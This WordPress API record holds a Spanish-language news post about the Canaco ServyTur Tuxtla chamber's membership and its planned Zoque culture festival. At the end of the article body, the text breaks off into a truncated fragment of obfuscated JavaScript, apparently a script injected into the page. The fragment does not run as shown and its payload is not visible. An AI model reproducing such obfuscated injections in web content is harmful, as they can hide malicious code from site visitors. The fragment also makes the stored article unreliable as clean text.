{"id":16497,"date":"2024-07-03T03:40:43","date_gmt":"2024-07-03T03:40:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16497"},"modified":"2024-07-03T03:40:44","modified_gmt":"2024-07-03T03:40:44","slug":"continuan-los-proyectos-de-la-canaco-impulsados-por-hugo-porras","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16497","title":{"rendered":"Contin\u00faan los proyectos de la Canaco, impulsados por Hugo Porras"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"946\" height=\"879\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719977981113.jpg\" alt=\"\" class=\"wp-image-16498\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719977981113.jpg 946w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719977981113-300x279.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1719977981113-768x714.jpg 768w\" sizes=\"auto, (max-width: 946px) 100vw, 946px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>2 de julio del 2024. Tuxtla Guti\u00e9rrez.- Miguel \u00c1ngel Blas Guti\u00e9rrez, presidente de la C\u00e1mara Nacional de Comercio Servicios y Turismo (Canaco ServyTur ) Tuxtla dio Inform\u00f3 que, actualmente son 2 mil 500 empresas agremiadas a la c\u00e1mara, y se espera que para el cierre de este a\u00f1o, lleguen a 2 mil 800 afiliados.<\/p>\n\n\n\n<p>La Canaco est\u00e1 actualmente sumando los esfuerzos para dar la continuidad a los grandes proyectos que se consolidaron a lo largo de los a\u00f1os.<\/p>\n\n\n\n<p>\u201cEstamos en el tema del festival el cual va muy avanzado, hemos invitado a la comunidad tuxtleca para que se sume al evento el cual ser\u00e1 de mucha utilidad\u201d, asegur\u00f3.<\/p>\n\n\n\n<p>Record\u00f3 que, la finalidad del mismo es la promoci\u00f3n de la cultura Zoque, con grandes muestras art\u00edsticas y culturales de este pueblo con fuertes ra\u00edces en la actualidad.<\/p>\n\n\n\n<p>Detall\u00f3 que, generalmente este festival se ha realizado en el mes de octubre, sin embargo, en esta ocasi\u00f3n est\u00e1 proyectado para el mes de septiembre.<\/p>\n\n\n\n<p>\u201cExiste tambi\u00e9n otro cambio, anteriormente se hac\u00eda de 3 d\u00edas, ahora ser\u00e1n 4, por ello la invitaci\u00f3n a que todos se sumen a este festival, sobretodo porque ser\u00e1 en honor a nuestro amigo Hugo Armando Porras P\u00e9rez y queremos que sea muy sobresaliente en este a\u00f1o\u201d, manifest\u00f3.<\/p>\n\n\n\n<p>Tendr\u00e1 como sede la Calzada de las Personas Ilustres, \u201cser\u00e1n m\u00e1s establecimientos los que van a participar en esta edici\u00f3n y se va a techar todo el andador para que, las personas que acudan no tengan problema con el tema de las lluvias o el sol\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 2 de julio del 2024. Tuxtla Guti\u00e9rrez.- Miguel \u00c1ngel Blas Guti\u00e9rrez, presidente de la C\u00e1mara Nacional de Comercio Servicios y Turismo (Canaco ServyTur ) Tuxtla dio Inform\u00f3 que, actualmente son 2 mil 500 empresas agremiadas a la c\u00e1mara, y se espera que para el cierre de este a\u00f1o, lleguen a 2 mil 800 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16498,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-16497","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16497","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16497"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16497\/revisions"}],"predecessor-version":[{"id":16499,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16497\/revisions\/16499"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16498"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16497"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16497"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16497"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}